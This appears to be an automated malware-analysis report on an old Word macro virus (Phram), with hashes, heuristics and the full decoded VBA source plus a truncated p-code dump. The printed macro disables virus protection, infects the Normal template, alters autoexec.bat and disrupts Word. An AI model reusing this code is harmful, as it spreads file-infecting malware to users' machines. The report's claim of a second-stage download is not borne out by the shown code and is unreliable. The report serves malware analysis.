Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b6bcb46ab4c790e5…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.0 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f26f6370290a64fed27cd30c54a498ad
SHA-1: 2d73c0fa1f660742234fb6e4ec2c36b90dc73d2a
SHA-256: b6bcb46ab4c790e596b8808bb4c2a91032c22ede6d7f4d68539fb489e6bbed1e
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The script attempts to establish persistence by writing a value to the registry key HKCU\Software\Microsoft\Office\yGen with the data 'phraming the world into the next millenium'. The macro code is truncated, but the presence of the Document_Open macro and the registry modification strongly suggest it is designed to download and execute a second-stage payload.

Heuristics (3)

  • ClamAV: Doc.Trojan.Phram-3 (severity: critical; id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Phram-3
  • VBA macros detected (severity: medium; id: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; id: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9580 bytes
SHA-256: 2d661f4a49b2115352f15e885306010be849e781a85f6a0725afc2a82fa9882c
Detection: ClamAV: Doc.Trojan.Phram-3
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()

'MyName = yGen
'WrittenBy = f0re

On Error Resume Next

CommandBars("Tools").Controls("macro").Visible = False
Application.EnableCancelKey = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.ConfirmConversions = 0

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "yGen") <> "phraming the world into the next millenium" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "yGen") = "phraming the world into the next millenium"
End If

NormalInstalled = False
ActiveInstalled = False

Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule

If NT.Lines(3, 1) = "'MyName = yGen" Then NormalInstalled = True
If AD.Lines(3, 1) = "'MyName = yGen" Then ActiveInstalled = True

If NormalInstalled = True And ActiveInstalled = True Then GoTo PhrameEnd

If NormalInstalled = False Then
    Set Infection = NT
    Set Carrier = AD
    Vircode = "Sub Document_Open()" & Chr(13) & Chr(10)
Else
    Set Infection = AD
    Set Carrier = NT
    Vircode = "Sub Document_Close()" & Chr(13) & Chr(10)
End If

With Carrier
    For X = 2 To .CountOfLines
        Vircode = Vircode & .Lines(X, 1) & Chr(13) & Chr(10)
        If .Lines(X, 1) = "End Sub" Then Exit For
    Next X
End With

With Infection
        .DeleteLines 1, .CountOfLines
        .InsertLines 1, Vircode
End With

If Norminstalled = False Then NormalTemplate.Save
If ActiveInstalled = False Then ActiveDocument.Save

PhrameEnd:

Root = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "SystemRoot")
Targ = Mid(Root, 1, 3)

Open Targ + "autoexec.bat" For Append As #1
        Print #1, "pause"
Close #1

Rndnm = Int((Rnd() * 15) + 1)
If Rndnm = 15 Then

    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.Font.ColorIndex = wdWhite
    Selection.TypeText "phraming the world into the next millenium"
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.HomeKey Unit:=wdLine
    Selection.MoveRight Unit:=wdCharacter, Count:=42, Extend:=wdExtend
    Selection.LanguageID = wdNoProofing
    Selection.HomeKey Unit:=wdStory

    ToolsCustomizeKeyboard.KeyCode = 27
    ToolsCustomizeKeyboard.Category = 1
    ToolsCustomizeKeyboard.Name = "Cancel"
    ToolsCustomizeKeyboard.Remove
    ToolsCustomizeKeyboard.Context = 0
    
    SendKeys "%" + "{F4}"

End If

End Sub


' Processing file: /opt/analyzer/scan_staging/4f111f88c05247eea09de74c37c6b8f1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5010 bytes
' Line #0:
' 	FuncDefn (Sub Document_Close())
' Line #1:
' Line #2:
' 	QuoteRem 0x0000 0x000D "MyName = yGen"
' Line #3:
' 	QuoteRem 0x0000 0x0010 "WrittenBy = f0re"
' Line #4:
' Line #5:
' 	OnError (Resume Next) 
' Line #6:
' Line #7:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Visible 
' Line #8:
' 	LitDI2 0x0000 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #9:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #10:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #11:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #12:
' Line #13:
' 	LitStr 0x0000 ""
' 	LitStr 0x002C "HKEY_CURRENT_USER\Software\Microsoft\Office\"
' 	LitStr 0x0004 "yGen"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x002A "phraming the world into the next millenium"
' 	Ne 
' 	IfBlock 
' Line #14:
' 	LitStr 0x002A "phraming the world into the next millenium"
' 	LitStr 0x0000 ""
' 	LitStr 0
... (truncated)